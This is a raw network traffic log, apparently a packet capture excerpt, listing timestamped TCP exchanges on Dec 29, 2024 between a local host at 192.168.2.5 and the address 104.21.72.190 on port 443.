Dec 29, 2024 09:23:13.650172949 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.650223970 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.651122093 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.651171923 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.652323008 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.652368069 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.653312922 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.653362989 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.654361010 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.654407024 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.655587912 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.655636072 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.657550097 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.657604933 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.658613920 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.658663988 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.659693956 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.659768105 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.660799980 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.661096096 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.661892891 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.661936045 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.662945032 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.662983894 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.664160013 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.664206982 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.666203976 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.666254044 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.668525934 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.668576002 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.669586897 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.669641018 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.670649052 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.670918941 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.671742916 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.671822071 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.672843933 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.672888994 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.673998117 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.674055099 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.674993038 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.675040007 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.677737951 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.677823067 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.678798914 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.678843975 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.679893017 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.679945946 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.680973053 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.681022882 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.682080030 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.682123899 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.683146954 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.683192968 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.684134007 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.686327934 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.686388016 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.686410904 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.686724901 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.687428951 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.687479019 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.687489033 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.689690113 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.689769983 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.689783096 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.690037012 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.744628906 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.744693995 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.744700909 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.744734049 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.744752884 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.744786024 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.745640993 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.745687008 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.746731043 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.746784925 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.747822046 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.747873068 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.843123913 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.843177080 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.843811035 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.843858004 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.844917059 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.844974041 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.846082926 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.846122980 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.847064018 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.847110033 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.848239899 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.848301888 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.849494934 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.849541903 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.852277040 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.852339029 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.853945017 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.853996992 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.855559111 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.855612040 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.856717110 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.856770992 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.857829094 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.857903004 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.860202074 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.860271931 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.861169100 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.861217976 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.861229897 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.864202023 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.864260912 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.864268064 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.865432024 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.865483046 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.865490913 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.865528107 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.867415905 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.867472887 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.868654013 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.868710041 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.870716095 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.870769978 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.872855902 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.872910976 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.873980045 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.874032021 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.876051903 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.876102924 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.877140045 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.877194881 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.878329992 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.878391027 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.879911900 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.879966021 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.882158041 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.882201910 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.884166002 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.884211063 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.885572910 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.885629892 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.887352943 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.887427092 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.888573885 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.888622999 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.890595913 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.890647888 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.892807007 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.892873049 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.944009066 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.944068909 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.949350119 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.949399948 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.949410915 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.949419022 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:13.949445963 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:13.949466944 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.044697046 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.044763088 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.045948029 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.046005964 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.047344923 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.047403097 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.048254967 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.048311949 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.050502062 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.050556898 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.052503109 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.052556038 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.053570986 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.053623915 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.055682898 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.055741072 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.058996916 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.059062004 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.064167023 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.064205885 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.064212084 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.064254999 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.064265013 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.064368010 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.065315962 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.065371990 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.067369938 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.067434072 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.068425894 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.068485022 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.069492102 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.070652008 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.070697069 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.070705891 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.070755005 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.072668076 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.072722912 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.079200983 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.079271078 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.079282045 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.079341888 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.081692934 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.081751108 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.083833933 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.083885908 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.085441113 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.085499048 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.087563038 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.087620974 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.090979099 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.091037989 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.092041016 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.092097998 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.093410015 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.093460083 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.145529985 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.145591021 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.147525072 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.147578001 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.150585890 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.150640965 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.246001005 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.246063948 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.248547077 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.248603106 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.249581099 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.249625921 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.250705957 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.250755072 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.253866911 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.253936052 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.255970955 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.256032944 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.258156061 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.258207083 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.260214090 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.260274887 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.262217999 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.262273073 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.265429974 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.265492916 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.266632080 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.266690969 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.269701958 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.269776106 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.270710945 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.270778894 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.271747112 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.271795034 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.273967981 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.274017096 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.274036884 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.275074959 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.275124073 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.276139021 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.276190042 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.277152061 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.277198076 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.278266907 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.278320074 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.279237032 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.279397964 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.281307936 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.281364918 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.284100056 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.284166098 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.286212921 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.286267996 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.288216114 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.288270950 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.290369034 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.290445089 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.292680979 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.292747021 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.346050978 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.346107006 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.346461058 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.346519947 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.348815918 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.348886013 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.350043058 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.350095987 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.446846008 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.446949005 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.448156118 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.448225975 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.449780941 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.449831009 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.451791048 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.451868057 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.453949928 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.454045057 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.457176924 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.457237005 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.460221052 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.460282087 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.462450981 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.462507010 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.469743967 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.469763041 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.469883919 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.469897032 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.469935894 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.473033905 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.473103046 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.476244926 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.476309061 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.478243113 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.478293896 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.480343103 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.480401993 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.483596087 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.483663082 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.486294985 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.486352921 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.489367962 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.489424944 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.491604090 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.491672039 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.493777037 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.493832111 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.548053980 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.548124075 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.549108982 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.549160957 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.551347971 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.551414013 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.648001909 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.648063898 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.650454044 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.650522947 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.653069973 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.653136015 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.656133890 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.656208038 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.658356905 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.658427954 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.660435915 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.660490036 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.664635897 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.664696932 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.666816950 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.666886091 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.670025110 CET	443	49709	104.21.72.190	192.168.2.5
Dec 29, 2024 09:23:14.670080900 CET	49709	443	192.168.2.5	104.21.72.190
Dec 29, 2024 09:23:14.677442074 CET	443	49709	104.21.72.190	192.168.2.5
